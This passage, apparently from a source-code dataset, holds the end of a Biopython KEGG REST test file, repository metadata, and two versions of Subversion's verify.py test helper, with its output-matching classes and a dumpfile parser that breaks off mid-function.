data = SeqIO.parse(h, "fasta")
self.assertEqual(len(list(data)), 2)
h.close()
def test_get_hsa_10458_plus_ece_Z5100_as_ntseq(self):
h = kegg_get("hsa:10458+ece:Z5100", "ntseq")
self.assertEqual(h.url,
"http://rest.kegg.jp/get/hsa:10458+ece:Z5100/ntseq")
data = SeqIO.parse(h, "fasta")
self.assertEqual(len(list(data)), 2)
h.close()
def test_get_hsa_10458_list_ece_Z5100_as_ntseq(self):
h = kegg_get(["hsa:10458", "ece:Z5100"], "ntseq")
self.assertEqual(h.url,
"http://rest.kegg.jp/get/hsa:10458+ece:Z5100/ntseq")
data = SeqIO.parse(h, "fasta")
self.assertEqual(len(list(data)), 2)
h.close()
def test_get_hsa05130_image(self):
h = kegg_get("hsa05130", "image")
data = h.read()
self.assertEqual(data[:4], b"\x89PNG")
self.assertEqual(h.url, "http://rest.kegg.jp/get/hsa05130/image")
h.close()
def test_conv_eco_ncbi_geneid(self):
h = kegg_conv("eco", "ncbi-geneid")
h.read()
self.assertEqual(h.url, "http://rest.kegg.jp/conv/eco/ncbi-geneid")
h.close()
def test_conv_ncbi_geneid_eco(self):
h = kegg_conv("ncbi-geneid", "eco")
h.read()
self.assertEqual(h.url, "http://rest.kegg.jp/conv/ncbi-geneid/eco")
h.close()
def test_conv_ncbi_gi_hsa_10458_plus_ece_Z5100(self):
h = kegg_conv("ncbi-gi", "hsa:10458+ece:Z5100")
h.read()
self.assertEqual(h.url,
"http://rest.kegg.jp/conv/ncbi-gi/hsa:10458+ece:Z5100")
h.close()
def test_conv_ncbi_gi_hsa_10458_list_ece_Z5100(self):
h = kegg_conv("ncbi-gi", ["hsa:10458", "ece:Z5100"])
h.read()
self.assertEqual(h.url,
"http://rest.kegg.jp/conv/ncbi-gi/hsa:10458+ece:Z5100")
h.close()
def test_link_pathway_hsa(self):
h = kegg_link("pathway", "hsa")
h.read()
self.assertEqual(h.url, "http://rest.kegg.jp/link/pathway/hsa")
h.close()
def test_link_hsa_pathway(self):
h = kegg_link("hsa", "pathway")
h.read()
self.assertEqual(h.url, "http://rest.kegg.jp/link/hsa/pathway")
h.close()
def test_pathway_hsa_10458_plus_ece_Z5100(self):
h = kegg_link("pathway", "hsa:10458+ece:Z5100")
h.read()
self.assertEqual(h.url,
"http://rest.kegg.jp/link/pathway/hsa:10458+ece:Z5100")
h.close()
def test_pathway_hsa_10458_list_ece_Z5100(self):
h = kegg_link("pathway", ["hsa:10458", "ece:Z5100"])
h.read()
self.assertEqual(h.url,
"http://rest.kegg.jp/link/pathway/hsa:10458+ece:Z5100")
h.close()
class KGMLPathwayTests(unittest.TestCase):
"""Tests with metabolic maps."""
def test_parse_remote_pathway(self):
"""Download a KEGG pathway from the KEGG server and parse KGML."""
h = kegg_get("ko03070", "kgml")
pathway = KGML_parser.read(h)
self.assertEqual(pathway.name, "path:ko03070")
h.close()
if __name__ == "__main__":
runner = unittest.TextTestRunner(verbosity=2)
unittest.main(testRunner=runner)
| 7,420 | 0 | 1,026 |
1c0ae2e2d38eb776d925bd91481af85cd42b69f5 | 22,148 | py | Python | subversion/tests/cmdline/svntest/verify.py | ruchirarya/svn | 81502a213251c2af21361a942bd9a8cd7d3adb9f | [
"Apache-2.0"
] | 7 | 2018-01-18T06:13:21.000Z | 2020-07-09T03:46:16.000Z | depe/subversion/subversion/tests/cmdline/svntest/verify.py | louis-tru/TouchCode2 | 91c182aeaa37fba16e381ea749d32906dab1aeea | [
"BSD-3-Clause-Clear"
] | 4 | 2015-01-12T22:23:41.000Z | 2015-01-12T22:33:52.000Z | src/subversion/subversion/tests/cmdline/svntest/verify.py | schwern/alien-svn | 7423b08f9bc4fdf0ac0d7ea53495269b21b3e8f9 | [
"Apache-2.0"
] | 1 | 2020-11-04T07:25:22.000Z | 2020-11-04T07:25:22.000Z | #
# verify.py: routines that handle comparison and display of expected
# vs. actual output
#
# Subversion is a tool for revision control.
# See http://subversion.tigris.org for more information.
#
# ====================================================================
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
######################################################################
import re, sys
from difflib import unified_diff, ndiff
import pprint
import logging
import svntest
logger = logging.getLogger()
######################################################################
# Exception types
class SVNUnexpectedOutput(svntest.Failure):
"""Exception raised if an invocation of svn results in unexpected
output of any kind."""
pass
class SVNUnexpectedStdout(SVNUnexpectedOutput):
"""Exception raised if an invocation of svn results in unexpected
output on STDOUT."""
pass
class SVNUnexpectedStderr(SVNUnexpectedOutput):
"""Exception raised if an invocation of svn results in unexpected
output on STDERR."""
pass
class SVNExpectedStdout(SVNUnexpectedOutput):
"""Exception raised if an invocation of svn results in no output on
STDOUT when output was expected."""
pass
class SVNExpectedStderr(SVNUnexpectedOutput):
"""Exception raised if an invocation of svn results in no output on
STDERR when output was expected."""
pass
class SVNUnexpectedExitCode(SVNUnexpectedOutput):
"""Exception raised if an invocation of svn exits with a value other
than what was expected."""
pass
class SVNIncorrectDatatype(SVNUnexpectedOutput):
"""Exception raised if invalid input is passed to the
run_and_verify_* API"""
pass
class SVNDumpParseError(svntest.Failure):
"""Exception raised if parsing a dump file fails"""
pass
######################################################################
# Comparison of expected vs. actual output
def createExpectedOutput(expected, output_type, match_all=True):
"""Return EXPECTED, promoted to an ExpectedOutput instance if not
None. Raise SVNIncorrectDatatype if the data type of EXPECTED is
not handled."""
if isinstance(expected, list):
expected = ExpectedOutput(expected)
elif isinstance(expected, str):
expected = RegexOutput(expected, match_all)
elif isinstance(expected, int):
expected = RegexOutput(".*: E%d:.*" % expected, False)
elif expected is AnyOutput:
expected = AnyOutput()
elif expected is not None and not isinstance(expected, ExpectedOutput):
raise SVNIncorrectDatatype("Unexpected type for '%s' data" % output_type)
return expected
class ExpectedOutput(object):
"""Matches an ordered list of lines.
If MATCH_ALL is True, the expected lines must match all the actual
lines, one-to-one, in the same order. If MATCH_ALL is False, the
expected lines must match a subset of the actual lines, one-to-one,
in the same order, ignoring any other actual lines among the
matching ones.
"""
def __init__(self, expected, match_all=True):
"""Initialize the expected output to EXPECTED which is a string, or
a list of strings.
"""
assert expected is not None
self.expected = expected
self.match_all = match_all
def matches(self, actual):
"""Return whether SELF matches ACTUAL (which may be a list
of newline-terminated lines, or a single string).
"""
assert actual is not None
expected = self.expected
if not isinstance(expected, list):
expected = [expected]
if not isinstance(actual, list):
actual = [actual]
if self.match_all:
return expected == actual
i_expected = 0
for actual_line in actual:
if expected[i_expected] == actual_line:
i_expected += 1
if i_expected == len(expected):
return True
return False
def display_differences(self, message, label, actual):
"""Show the differences between the expected and ACTUAL lines. Print
MESSAGE unless it is None, the expected lines, the ACTUAL lines,
and a diff, all labeled with LABEL.
"""
display_lines(message, self.expected, actual, label, label)
display_lines_diff(self.expected, actual, label, label)
class AnyOutput(ExpectedOutput):
"""Matches any non-empty output.
"""
class RegexOutput(ExpectedOutput):
"""Matches a single regular expression.
If MATCH_ALL is true, every actual line must match the RE. If
MATCH_ALL is false, at least one actual line must match the RE. In
any case, there must be at least one line of actual output.
"""
def __init__(self, expected, match_all=True):
"EXPECTED is a regular expression string."
assert isinstance(expected, str)
ExpectedOutput.__init__(self, expected, match_all)
self.expected_re = re.compile(expected)
class RegexListOutput(ExpectedOutput):
"""Matches an ordered list of regular expressions.
If MATCH_ALL is True, the expressions must match all the actual
lines, one-to-one, in the same order. If MATCH_ALL is False, the
expressions must match a subset of the actual lines, one-to-one, in
the same order, ignoring any other actual lines among the matching
ones.
In any case, there must be at least one line of actual output.
"""
def __init__(self, expected, match_all=True):
"EXPECTED is a list of regular expression strings."
assert isinstance(expected, list) and expected != []
ExpectedOutput.__init__(self, expected, match_all)
self.expected_res = [re.compile(e) for e in expected]
class UnorderedOutput(ExpectedOutput):
"""Matches an unordered list of lines.
The expected lines must match all the actual lines, one-to-one, in
any order.
"""
class UnorderedRegexListOutput(ExpectedOutput):
"""Matches an unordered list of regular expressions.
The expressions must match all the actual lines, one-to-one, in any
order.
Note: This can give a false negative result (no match) when there is
an actual line that matches multiple expressions and a different
actual line that matches some but not all of those same
expressions. The implementation matches each expression in turn to
the first unmatched actual line that it can match, and does not try
all the permutations when there are multiple possible matches.
"""
class AlternateOutput(ExpectedOutput):
"""Matches any one of a list of ExpectedOutput instances.
"""
def __init__(self, expected, match_all=True):
"EXPECTED is a list of ExpectedOutput instances."
assert isinstance(expected, list) and expected != []
assert all(isinstance(e, ExpectedOutput) for e in expected)
ExpectedOutput.__init__(self, expected)
######################################################################
# Displaying expected and actual output
def display_trees(message, label, expected, actual):
'Print two trees, expected and actual.'
if message is not None:
logger.warn(message)
if expected is not None:
logger.warn('EXPECTED %s:', label)
svntest.tree.dump_tree(expected)
if actual is not None:
logger.warn('ACTUAL %s:', label)
svntest.tree.dump_tree(actual)
def display_lines_diff(expected, actual, expected_label, actual_label):
"""Print a unified diff between EXPECTED (labeled with EXPECTED_LABEL)
and ACTUAL (labeled with ACTUAL_LABEL).
Each of EXPECTED and ACTUAL is a string or a list of strings.
"""
if not isinstance(expected, list):
expected = [expected]
if not isinstance(actual, list):
actual = [actual]
logger.warn('DIFF ' + expected_label + ':')
for x in unified_diff(expected, actual,
fromfile='EXPECTED ' + expected_label,
tofile='ACTUAL ' + actual_label):
logger.warn('| ' + x.rstrip())
def display_lines(message, expected, actual,
expected_label, actual_label=None):
"""Print MESSAGE, unless it is None, then print EXPECTED (labeled
with EXPECTED_LABEL) followed by ACTUAL (labeled with ACTUAL_LABEL).
Each of EXPECTED and ACTUAL is a string or a list of strings.
"""
if message is not None:
logger.warn(message)
if type(expected) is str:
expected = [expected]
if type(actual) is str:
actual = [actual]
if actual_label is None:
actual_label = expected_label
if expected is not None:
logger.warn('EXPECTED %s:', expected_label)
for x in expected:
logger.warn('| ' + x.rstrip())
if actual is not None:
logger.warn('ACTUAL %s:', actual_label)
for x in actual:
logger.warn('| ' + x.rstrip())
def compare_and_display_lines(message, label, expected, actual,
raisable=None):
"""Compare two sets of output lines, and print them if they differ,
preceded by MESSAGE iff not None. EXPECTED may be an instance of
ExpectedOutput (and if not, it is wrapped as such). ACTUAL may be a
list of newline-terminated lines, or a single string. RAISABLE is an
exception class, an instance of which is thrown if ACTUAL doesn't
match EXPECTED."""
if raisable is None:
raisable = svntest.main.SVNLineUnequal
### It'd be nicer to use createExpectedOutput() here, but its
### semantics don't match all current consumers of this function.
assert expected is not None
assert actual is not None
if not isinstance(expected, ExpectedOutput):
expected = ExpectedOutput(expected)
if isinstance(actual, str):
actual = [actual]
actual = svntest.main.filter_dbg(actual)
if not expected.matches(actual):
expected.display_differences(message, label, actual)
raise raisable
def verify_outputs(message, actual_stdout, actual_stderr,
expected_stdout, expected_stderr, all_stdout=True):
"""Compare and display expected vs. actual stderr and stdout lines:
if they don't match, print the difference (preceded by MESSAGE iff
not None) and raise an exception.
If EXPECTED_STDERR or EXPECTED_STDOUT is a string the string is
interpreted as a regular expression. For EXPECTED_STDOUT and
ACTUAL_STDOUT to match, every line in ACTUAL_STDOUT must match the
EXPECTED_STDOUT regex, unless ALL_STDOUT is false. For
EXPECTED_STDERR regexes only one line in ACTUAL_STDERR need match."""
expected_stderr = createExpectedOutput(expected_stderr, 'stderr', False)
expected_stdout = createExpectedOutput(expected_stdout, 'stdout', all_stdout)
for (actual, expected, label, raisable) in (
(actual_stderr, expected_stderr, 'STDERR', SVNExpectedStderr),
(actual_stdout, expected_stdout, 'STDOUT', SVNExpectedStdout)):
if expected is None:
continue
if isinstance(expected, RegexOutput):
raisable = svntest.main.SVNUnmatchedError
elif not isinstance(expected, AnyOutput):
raisable = svntest.main.SVNLineUnequal
compare_and_display_lines(message, label, expected, actual, raisable)
def verify_exit_code(message, actual, expected,
raisable=SVNUnexpectedExitCode):
"""Compare and display expected vs. actual exit codes:
if they don't match, print the difference (preceded by MESSAGE iff
not None) and raise an exception."""
if expected != actual:
display_lines(message, str(expected), str(actual), "Exit Code")
raise raisable
# A simple dump file parser. While sufficient for the current
# testsuite it doesn't cope with all valid dump files.
# One day we may need to parse individual property name/values into a map
def compare_dump_files(message, label, expected, actual):
  """Parse the dump files EXPECTED and ACTUAL, both lists of lines as
  returned by run_and_verify_dump, and fail if their parsed revisions,
  nodes, properties, etc. differ.
  """
  expected_dump = DumpParser(expected).parse()
  actual_dump = DumpParser(actual).parse()
  if expected_dump != actual_dump:
    diff = ndiff(pprint.pformat(expected_dump).splitlines(),
                 pprint.pformat(actual_dump).splitlines())
    raise svntest.Failure('\n' + '\n'.join(diff))
| 34.28483 | 81 | 0.675411 | #
# verify.py: routines that handle comparison and display of expected
# vs. actual output
#
# Subversion is a tool for revision control.
# See http://subversion.tigris.org for more information.
#
# ====================================================================
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
######################################################################
import re, sys
from difflib import unified_diff, ndiff
import pprint
import logging
import svntest
logger = logging.getLogger()
######################################################################
# Exception types
class SVNUnexpectedOutput(svntest.Failure):
  """An invocation of svn produced unexpected output of some kind."""
class SVNUnexpectedStdout(SVNUnexpectedOutput):
  """An invocation of svn produced unexpected output on STDOUT."""
class SVNUnexpectedStderr(SVNUnexpectedOutput):
  """An invocation of svn produced unexpected output on STDERR."""
class SVNExpectedStdout(SVNUnexpectedOutput):
  """An invocation of svn produced no output on STDOUT although some
  was expected."""
class SVNExpectedStderr(SVNUnexpectedOutput):
  """An invocation of svn produced no output on STDERR although some
  was expected."""
class SVNUnexpectedExitCode(SVNUnexpectedOutput):
  """An invocation of svn exited with a value other than the one that
  was expected."""
class SVNIncorrectDatatype(SVNUnexpectedOutput):
  """Invalid input was passed to the run_and_verify_* API."""
class SVNDumpParseError(svntest.Failure):
  """A dump file could not be parsed."""
######################################################################
# Comparison of expected vs. actual output
def createExpectedOutput(expected, output_type, match_all=True):
  """Promote EXPECTED to an ExpectedOutput instance (None passes
  through unchanged).  A list becomes an ExpectedOutput, a string a
  RegexOutput, an int a RegexOutput matching the corresponding 'E%d'
  svn error code, and the AnyOutput class an AnyOutput instance.
  Raise SVNIncorrectDatatype for anything else."""
  if isinstance(expected, list):
    return ExpectedOutput(expected)
  if isinstance(expected, str):
    return RegexOutput(expected, match_all)
  if isinstance(expected, int):
    return RegexOutput(".*: E%d:.*" % expected, False)
  if expected is AnyOutput:
    return AnyOutput()
  if expected is None or isinstance(expected, ExpectedOutput):
    return expected
  raise SVNIncorrectDatatype("Unexpected type for '%s' data" % output_type)
class ExpectedOutput(object):
  """Matches an ordered list of lines.

  With MATCH_ALL set, every actual line must equal the corresponding
  expected line, one-to-one and in order.  With MATCH_ALL unset, the
  expected lines need only appear as an ordered (not necessarily
  contiguous) subsequence of the actual lines.
  """

  def __init__(self, expected, match_all=True):
    """EXPECTED is a string or a list of strings."""
    assert expected is not None
    self.expected = expected
    self.match_all = match_all

  def __str__(self):
    return str(self.expected)

  def __cmp__(self, other):
    raise TypeError("ExpectedOutput does not implement direct comparison; "
                    "see the 'matches()' method")

  def matches(self, actual):
    """Return whether SELF matches ACTUAL (a single string or a list of
    newline-terminated lines)."""
    assert actual is not None
    want = self.expected if isinstance(self.expected, list) else [self.expected]
    got = actual if isinstance(actual, list) else [actual]
    if self.match_all:
      return want == got
    # Subsequence match: walk GOT, advancing through WANT on each hit.
    next_want = 0
    for line in got:
      if want[next_want] == line:
        next_want += 1
        if next_want == len(want):
          return True
    return False

  def display_differences(self, message, label, actual):
    """Log the expected lines, the ACTUAL lines, and a diff, all
    labeled with LABEL, preceded by MESSAGE unless it is None."""
    display_lines(message, self.expected, actual, label, label)
    display_lines_diff(self.expected, actual, label, label)
class AnyOutput(ExpectedOutput):
  """Matches any output containing at least one non-empty line."""

  def __init__(self):
    ExpectedOutput.__init__(self, [], False)

  def matches(self, actual):
    assert actual is not None
    # Any line with some text means there is output, hence a match;
    # an empty list (or all-empty lines) is not a match.
    return any(line for line in actual)

  def display_differences(self, message, label, actual):
    if message:
      logger.warn(message)
class RegexOutput(ExpectedOutput):
  """Matches a single regular expression.

  With MATCH_ALL set, every actual line must match the expression;
  otherwise one matching line suffices.  Either way there must be at
  least one line of actual output.
  """

  def __init__(self, expected, match_all=True):
    "EXPECTED is a regular expression string."
    assert isinstance(expected, str)
    ExpectedOutput.__init__(self, expected, match_all)
    self.expected_re = re.compile(expected)

  def matches(self, actual):
    assert actual is not None
    lines = actual if isinstance(actual, list) else [actual]
    if not lines:
      # A regex implies we require some actual output; none is a failure.
      return False
    hits = (self.expected_re.match(line) for line in lines)
    return all(hits) if self.match_all else any(hits)

  def display_differences(self, message, label, actual):
    display_lines(message, self.expected, actual, label + ' (regexp)', label)
class RegexListOutput(ExpectedOutput):
  """Matches an ordered list of regular expressions.

  With MATCH_ALL set, the expressions and the actual lines must pair up
  one-to-one, in order.  Otherwise the expressions must match an
  ordered (not necessarily contiguous) subsequence of the actual lines.

  In any case, there must be at least one line of actual output.
  """

  def __init__(self, expected, match_all=True):
    "EXPECTED is a list of regular expression strings."
    assert isinstance(expected, list) and expected != []
    ExpectedOutput.__init__(self, expected, match_all)
    self.expected_res = [re.compile(e) for e in expected]

  def matches(self, actual):
    assert actual is not None
    lines = actual if isinstance(actual, list) else [actual]
    if self.match_all:
      if len(self.expected_res) != len(lines):
        return False
      return all(r.match(line) for r, line in zip(self.expected_res, lines))
    # Subsequence match over the compiled expressions.
    pos = 0
    for line in lines:
      if self.expected_res[pos].match(line):
        pos += 1
        if pos == len(self.expected_res):
          return True
    return False

  def display_differences(self, message, label, actual):
    display_lines(message, self.expected, actual, label + ' (regexp)', label)
class UnorderedOutput(ExpectedOutput):
  """Matches a list of lines irrespective of their order.

  Every expected line must pair up with exactly one actual line.
  """

  def __init__(self, expected):
    assert isinstance(expected, list)
    ExpectedOutput.__init__(self, expected)

  def matches(self, actual):
    lines = actual if isinstance(actual, list) else [actual]
    return sorted(self.expected) == sorted(lines)

  def display_differences(self, message, label, actual):
    display_lines(message, self.expected, actual, label + ' (unordered)', label)
    display_lines_diff(self.expected, actual, label + ' (unordered)', label)
class UnorderedRegexListOutput(ExpectedOutput):
  """Matches a list of regular expressions irrespective of order.

  Every expression must pair up with exactly one actual line.

  Note: this can give a false negative (no match) when one actual line
  matches several expressions while a different actual line matches
  only some of them: each expression greedily claims the first
  still-unclaimed matching line, and no other pairings are tried.
  """

  def __init__(self, expected):
    assert isinstance(expected, list)
    ExpectedOutput.__init__(self, expected)

  def matches(self, actual):
    assert actual is not None
    if not isinstance(actual, list):
      actual = [actual]
    if len(self.expected) != len(actual):
      return False
    # NOTE: matched lines are removed from ACTUAL in place, so a list
    # passed by the caller is consumed by a successful match.
    for pattern in self.expected:
      compiled = re.compile(pattern)
      claimed = None
      for line in actual:
        if compiled.match(line):
          claimed = line
          break
      if claimed is None:
        # This expression matched none of the remaining lines.
        return False
      actual.remove(claimed)
    return True

  def display_differences(self, message, label, actual):
    display_lines(message, self.expected, actual,
                  label + ' (regexp) (unordered)', label)
class AlternateOutput(ExpectedOutput):
  """Matches if any one of a list of ExpectedOutput instances matches."""

  def __init__(self, expected, match_all=True):
    "EXPECTED is a list of ExpectedOutput instances."
    assert isinstance(expected, list) and expected != []
    assert all(isinstance(e, ExpectedOutput) for e in expected)
    ExpectedOutput.__init__(self, expected)

  def matches(self, actual):
    assert actual is not None
    return any(e.matches(actual) for e in self.expected)

  def display_differences(self, message, label, actual):
    # For now, just display differences against the first alternative.
    self.expected[0].display_differences(message, label, actual)
######################################################################
# Displaying expected and actual output
def display_trees(message, label, expected, actual):
  """Dump the EXPECTED and ACTUAL trees (each skipped when None),
  labeled with LABEL and preceded by MESSAGE unless it is None."""
  if message is not None:
    logger.warn(message)
  for prefix, tree in (('EXPECTED', expected), ('ACTUAL', actual)):
    if tree is not None:
      logger.warn(prefix + ' %s:', label)
      svntest.tree.dump_tree(tree)
def display_lines_diff(expected, actual, expected_label, actual_label):
  """Log a unified diff between EXPECTED (labeled EXPECTED_LABEL) and
  ACTUAL (labeled ACTUAL_LABEL).

  Each of EXPECTED and ACTUAL is a string or a list of strings.
  """
  expected_lines = expected if isinstance(expected, list) else [expected]
  actual_lines = actual if isinstance(actual, list) else [actual]
  logger.warn('DIFF ' + expected_label + ':')
  diff = unified_diff(expected_lines, actual_lines,
                      fromfile='EXPECTED ' + expected_label,
                      tofile='ACTUAL ' + actual_label)
  for line in diff:
    logger.warn('| ' + line.rstrip())
def display_lines(message, expected, actual,
                  expected_label, actual_label=None):
  """Print MESSAGE, unless it is None, then print EXPECTED (labeled
  with EXPECTED_LABEL) followed by ACTUAL (labeled with ACTUAL_LABEL,
  which defaults to EXPECTED_LABEL).

  Each of EXPECTED and ACTUAL is a string, a list of strings, or None
  (in which case that side is skipped)."""
  if message is not None:
    logger.warn(message)
  # Use isinstance rather than a type() identity test, for consistency
  # with display_lines_diff and to accept str subclasses.
  if isinstance(expected, str):
    expected = [expected]
  if isinstance(actual, str):
    actual = [actual]
  if actual_label is None:
    actual_label = expected_label
  if expected is not None:
    logger.warn('EXPECTED %s:', expected_label)
    for line in expected:
      logger.warn('| ' + line.rstrip())
  if actual is not None:
    logger.warn('ACTUAL %s:', actual_label)
    for line in actual:
      logger.warn('| ' + line.rstrip())
def compare_and_display_lines(message, label, expected, actual,
                              raisable=None):
  """Check EXPECTED against ACTUAL and, on mismatch, display both
  (preceded by MESSAGE unless it is None, labeled with LABEL) and raise
  RAISABLE (default: svntest.main.SVNLineUnequal).

  EXPECTED may be an ExpectedOutput instance (and is wrapped as one if
  not); ACTUAL is a single string or a list of newline-terminated
  lines."""
  if raisable is None:
    raisable = svntest.main.SVNLineUnequal
  ### It'd be nicer to use createExpectedOutput() here, but its
  ### semantics don't match all current consumers of this function.
  assert expected is not None
  assert actual is not None
  if not isinstance(expected, ExpectedOutput):
    expected = ExpectedOutput(expected)
  actual_lines = [actual] if isinstance(actual, str) else actual
  actual_lines = svntest.main.filter_dbg(actual_lines)
  if not expected.matches(actual_lines):
    expected.display_differences(message, label, actual_lines)
    raise raisable
def verify_outputs(message, actual_stdout, actual_stderr,
                   expected_stdout, expected_stderr, all_stdout=True):
  """Check ACTUAL_STDOUT and ACTUAL_STDERR against their expectations,
  displaying any difference (preceded by MESSAGE unless it is None) and
  raising an exception on mismatch.

  A string expectation is interpreted as a regular expression.  Every
  line of ACTUAL_STDOUT must match the EXPECTED_STDOUT regex unless
  ALL_STDOUT is false, whereas a single matching line satisfies an
  EXPECTED_STDERR regex."""
  checks = (
    (actual_stderr, createExpectedOutput(expected_stderr, 'stderr', False),
     'STDERR', SVNExpectedStderr),
    (actual_stdout, createExpectedOutput(expected_stdout, 'stdout', all_stdout),
     'STDOUT', SVNExpectedStdout),
  )
  for actual, expected, label, default_raisable in checks:
    if expected is None:
      continue
    # Regex expectations raise SVNUnmatchedError; plain line lists raise
    # SVNLineUnequal; AnyOutput keeps the per-stream default.
    if isinstance(expected, RegexOutput):
      raisable = svntest.main.SVNUnmatchedError
    elif isinstance(expected, AnyOutput):
      raisable = default_raisable
    else:
      raisable = svntest.main.SVNLineUnequal
    compare_and_display_lines(message, label, expected, actual, raisable)
def verify_exit_code(message, actual, expected,
                     raisable=SVNUnexpectedExitCode):
  """Check that ACTUAL equals the EXPECTED exit code; on mismatch,
  display both values (preceded by MESSAGE unless it is None) and raise
  RAISABLE."""
  if actual != expected:
    display_lines(message, str(expected), str(actual), "Exit Code")
    raise raisable
# A simple dump file parser. While sufficient for the current
# testsuite it doesn't cope with all valid dump files.
class DumpParser:
  """Parse a Subversion dumpfile, supplied as a list of lines, into a
  nested dict:

    { 'format': <version string>, 'uuid': <uuid string>,
      <revnum string>: { 'prop_length': ..., 'content_length': ...,
                         'props': [<raw property lines>],
                         'nodes': { <path>: { <action>: <node dict> } } } }

  Sufficient for the current testsuite, but it doesn't cope with all
  valid dump files.
  """

  def __init__(self, lines):
    self.current = 0   # index into LINES of the next unconsumed line
    self.lines = lines
    self.parsed = {}

  def parse_line(self, regex, required=True):
    """Match REGEX against the current line; on success consume the
    line and return the first capture group.  Otherwise raise
    SVNDumpParseError (if REQUIRED) or return None without advancing."""
    m = re.match(regex, self.lines[self.current])
    if not m:
      if required:
        raise SVNDumpParseError("expected '%s' at line %d\n%s"
                                % (regex, self.current,
                                   self.lines[self.current]))
      else:
        return None
    self.current += 1
    return m.group(1)

  def parse_blank(self, required=True):
    """Consume one blank line and return True; otherwise raise (if
    REQUIRED) or return False without advancing."""
    if self.lines[self.current] != '\n':  # Works on Windows
      if required:
        raise SVNDumpParseError("expected blank at line %d\n%s"
                                % (self.current, self.lines[self.current]))
      else:
        return False
    self.current += 1
    return True

  def parse_format(self):
    """Consume and return the dumpfile format version."""
    return self.parse_line('SVN-fs-dump-format-version: ([0-9]+)$')

  def parse_uuid(self):
    """Consume and return the repository UUID."""
    return self.parse_line('UUID: ([0-9a-z-]+)$')

  def parse_revision(self):
    """Consume and return a revision number (as a string)."""
    return self.parse_line('Revision-number: ([0-9]+)$')

  def parse_prop_length(self, required=True):
    return self.parse_line('Prop-content-length: ([0-9]+)$', required)

  def parse_content_length(self, required=True):
    return self.parse_line('Content-length: ([0-9]+)$', required)

  def parse_path(self):
    """Return the node path (possibly ''), or None if the current line
    is not a Node-path header."""
    path = self.parse_line('Node-path: (.+)$', required=False)
    if not path and self.lines[self.current] == 'Node-path: \n':
      # An empty path: the '(.+)' group above cannot match it.
      self.current += 1
      path = ''
    return path

  def parse_kind(self):
    return self.parse_line('Node-kind: (.+)$', required=False)

  def parse_action(self):
    return self.parse_line('Node-action: ([0-9a-z-]+)$')

  def parse_copyfrom_rev(self):
    return self.parse_line('Node-copyfrom-rev: ([0-9]+)$', required=False)

  def parse_copyfrom_path(self):
    """Return the copyfrom path (possibly ''), or None if absent."""
    path = self.parse_line('Node-copyfrom-path: (.+)$', required=False)
    if not path and self.lines[self.current] == 'Node-copyfrom-path: \n':
      self.current += 1
      path = ''
    return path

  def parse_copy_md5(self):
    return self.parse_line('Text-copy-source-md5: ([0-9a-z]+)$', required=False)

  def parse_copy_sha1(self):
    return self.parse_line('Text-copy-source-sha1: ([0-9a-z]+)$', required=False)

  def parse_text_md5(self):
    return self.parse_line('Text-content-md5: ([0-9a-z]+)$', required=False)

  def parse_text_sha1(self):
    return self.parse_line('Text-content-sha1: ([0-9a-z]+)$', required=False)

  def parse_text_length(self):
    return self.parse_line('Text-content-length: ([0-9]+)$', required=False)

  # One day we may need to parse individual property name/values into a map
  def get_props(self):
    """Consume and return the raw property lines up to PROPS-END."""
    props = []
    while not re.match('PROPS-END$', self.lines[self.current]):
      props.append(self.lines[self.current])
      self.current += 1
    self.current += 1
    return props

  def get_content(self, length):
    """Consume and return LENGTH characters of node content, tolerating
    one extra trailing newline."""
    content = ''
    while len(content) < length:
      content += self.lines[self.current]
      self.current += 1
    if len(content) == length + 1:
      content = content[:-1]
    elif len(content) != length:
      raise SVNDumpParseError("content length expected %d actual %d at line %d"
                              % (length, len(content), self.current))
    return content

  def parse_one_node(self):
    """Parse one node record (headers plus optional props and content)
    and return (action, node-dict)."""
    node = {}
    node['kind'] = self.parse_kind()
    action = self.parse_action()
    node['copyfrom_rev'] = self.parse_copyfrom_rev()
    node['copyfrom_path'] = self.parse_copyfrom_path()
    node['copy_md5'] = self.parse_copy_md5()
    node['copy_sha1'] = self.parse_copy_sha1()
    node['prop_length'] = self.parse_prop_length(required=False)
    node['text_length'] = self.parse_text_length()
    node['text_md5'] = self.parse_text_md5()
    node['text_sha1'] = self.parse_text_sha1()
    node['content_length'] = self.parse_content_length(required=False)
    self.parse_blank()
    if node['prop_length']:
      node['props'] = self.get_props()
    if node['text_length']:
      node['content'] = self.get_content(int(node['text_length']))
    # Hard to determine how many blanks is 'correct' (a delete that is
    # followed by an add that is a replace and a copy has one fewer
    # than expected but that can't be predicted until seeing the add)
    # so allow arbitrary number
    blanks = 0
    while self.current < len(self.lines) and self.parse_blank(required=False):
      blanks += 1
    node['blanks'] = blanks
    return action, node

  def parse_all_nodes(self):
    """Parse node records up to the next revision header (or EOF) and
    return a map of path -> action -> node-dict."""
    nodes = {}
    while True:
      if self.current >= len(self.lines):
        break
      path = self.parse_path()
      if path is None:
        # Not a Node-path header: end of this revision's nodes.
        # (The previous test, 'not path and not path is ""', depended
        # on fragile string-literal identity and raises a SyntaxWarning
        # on modern Pythons; a None check is the intended meaning,
        # since parse_path() returns '' for a legitimately empty path.)
        break
      if path not in nodes:
        nodes[path] = {}
      action, node = self.parse_one_node()
      if action in nodes[path]:
        raise SVNDumpParseError("duplicate action '%s' for node '%s' at line %d"
                                % (action, path, self.current))
      nodes[path][action] = node
    return nodes

  def parse_one_revision(self):
    """Parse one revision record and return (revnum, revision-dict)."""
    revision = {}
    number = self.parse_revision()
    revision['prop_length'] = self.parse_prop_length()
    revision['content_length'] = self.parse_content_length()
    self.parse_blank()
